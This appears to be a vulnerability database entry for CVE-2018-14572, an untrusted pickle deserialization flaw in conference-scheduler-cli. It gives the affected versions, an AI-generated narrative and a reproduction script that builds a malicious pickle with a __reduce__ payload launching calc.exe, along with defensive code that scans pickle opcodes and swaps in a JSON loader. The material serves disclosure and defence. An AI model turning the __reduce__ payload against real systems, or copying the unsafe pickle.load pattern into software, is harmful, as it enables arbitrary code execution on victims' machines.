CVE-2018-14572
Description
Conference-scheduler-cli deserializes untrusted pickle data, allowing remote code execution via a crafted .pickle file.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The conference-scheduler-cli tool, a Python command-line utility for managing conference schedules, uses pickle.load() on data imported from .pickle files without any validation or sanitization [1][2]. This deserialization vulnerability exists in all versions of the tool prior to any fix. The code path is reachable when the tool processes imported schedule data, which can be supplied by an attacker as a malicious .pickle file [1].
Exploitation
An attacker needs only to provide a crafted .pickle file to the victim, either by direct file transfer, network share, or social engineering. No authentication or special privileges are required. The attacker embeds arbitrary Python code (e.g., os.system) within the pickle serialization. When the victim runs the scheduler build command or any operation that loads the imported data, the tool calls pickle.load() on the malicious file, executing the embedded code [1][2].
Impact
Successful exploitation results in arbitrary code execution with the privileges of the user running the conference-scheduler-cli tool. This can lead to full compromise of the affected system, including data exfiltration, installation of malware, or further lateral movement [1][2].
Mitigation
As of the publication date (2018-08-28), no official patch has been released for this vulnerability [2][3]. The project may be unmaintained. Users should avoid loading untrusted .pickle files and consider using safer serialization formats such as JSON or YAML. If the tool must be used, restrict file sources to trusted origins and apply strict file integrity checks [2][3].
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| conference-scheduler-cli (PyPI) | <= 0.10.1 | — |
Affected products: 1
Patches: 0
No patches discovered yet.
Vulnerability mechanics
Root cause
"The application deserializes untrusted pickle data, allowing arbitrary code execution."
Attack vector
An attacker can craft a malicious `.pickle` file containing Python code that executes arbitrary commands, such as `os.system` or `subprocess.Popen` [ref_id=1]. This file can then be imported by the `conference-scheduler-cli` application via the `io.import_schedule_definition` function, leading to remote code execution [ref_id=1]. The vulnerability is present in versions up to and including 0.10.1 [ref_id=1].
Affected code
The vulnerability lies within the `pickle.load` call on imported data in the `conference-scheduler-cli` application. Specifically, the `io.import_schedule_definition` function is used to load data from a `.pickle` file, which is then deserialized without proper validation [ref_id=1].
What the fix does
The advisory recommends using `yaml.safe_load` to parse YAML files instead of `pickle.load` for imported data [ref_id=1]. This change would prevent the deserialization of untrusted pickle data, thereby mitigating the risk of arbitrary code execution.
Preconditions
- Input: The attacker must provide a crafted `.pickle` file.
- Input: The target system must be running a vulnerable version of `conference-scheduler-cli` (<= 0.10.1).
Reproduction
```python
from pathlib import Path
import pickle

from scheduler import io  # conference-scheduler-cli's own io module


class joel_test(object):
    # pickle records the callable and arguments returned by __reduce__;
    # pickle.load() invokes them when the file is deserialized.
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, ('calc.exe',))


test = joel_test()
with open(Path('solution', 'scheduler.pickle'), 'wb') as f:
    pickle.dump(test, f)
# Vulnerable code path: deserializes the crafted file with pickle.load().
io.import_schedule_definition(Path(Path.cwd(), 'solution'))
```
[ref_id=1]
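A defender-side check and the fix the advisory recommends, as an added example that is not part of this advisory or of the conference-scheduler-cli project: it lists the opcodes of a pickle stream without loading it (so a file using the `__reduce__` trick from the reproduction is flagged before `pickle.load()` ever runs), and places the `pickle.load` pattern from the "Affected code" section beside a data-only loader. The function names, the `scheduler.json` file and the sample schedules are assumptions.

```python
import json
import pickle
import pickletools
import tempfile
from pathlib import Path

# Opcodes that resolve or invoke a Python callable. Any of them in an untrusted
# pickle means pickle.load() hands control to code chosen by the file's author.
DANGEROUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ",
                     "NEWOBJ_EX", "REDUCE", "BUILD"}

def pickle_opcodes(data: bytes) -> set:
    """List the opcodes in a pickle stream without executing any of it."""
    return {op.name for op, _arg, _pos in pickletools.genops(data)}

def is_unsafe_pickle(data: bytes) -> bool:
    """True if the stream contains an opcode that can call arbitrary code."""
    return bool(pickle_opcodes(data) & DANGEROUS_OPCODES)

def import_schedule_definition_vulnerable(directory: Path) -> dict:
    # The pattern the advisory describes (file name is a stand-in): the file
    # comes from the user and pickle.load() runs whatever it encodes.
    with open(directory / "scheduler.pickle", "rb") as f:
        return pickle.load(f)

def import_schedule_definition_safe(directory: Path) -> dict:
    # Hardened replacement: a data-only format. JSON is used because it is in
    # the standard library; yaml.safe_load (the advisory's choice) is equivalent.
    with open(directory / "scheduler.json", encoding="utf-8") as f:
        return json.load(f)

def demo_safe_import() -> dict:
    """Write a constructed schedule as JSON and read it back safely."""
    schedule = {"events": ["talk A", "talk B"], "slots": 2}
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "scheduler.json").write_text(json.dumps(schedule))
        return import_schedule_definition_safe(Path(tmp))

# Constructed sample: a benign schedule made only of dicts, lists and strings.
BENIGN = pickle.dumps({"events": ["talk A", "talk B"], "slots": 2})

class _CallsOnLoad:
    # Constructed sample using the same __reduce__ trick as the reproduction,
    # but pointing at the harmless builtin len() so the opcode scan, not a
    # payload, is what this shows. It is never unpickled in this example.
    def __reduce__(self):
        return (len, (["x"],))

SUSPICIOUS = pickle.dumps(_CallsOnLoad())
```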
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References (6)
- github.com/advisories/GHSA-cf3c-fffp-34qh (source: GHSA, type: ADVISORY)
- nvd.nist.gov/vuln/detail/CVE-2018-14572 (source: GHSA, type: ADVISORY)
- github.com/PyconUK/ConferenceScheduler-cli/issues/19 (source: GHSA, tag: x_refsource_MISC, type: WEB)
- github.com/pypa/advisory-database/tree/main/vulns/conference-scheduler-cli/PYSEC-2018-64.yaml (source: GHSA, type: WEB)
- joel-malwarebenchmark.github.io/blog/2020/04/25/cve-2018-14572-conference-scheduler-cli (source: GHSA, type: WEB)
- joel-malwarebenchmark.github.io/blog/2020/04/25/cve-2018-14572-conference-scheduler-cli/ (source: MITRE, tag: x_refsource_MISC)
News mentions: 0
No linked articles in our index yet.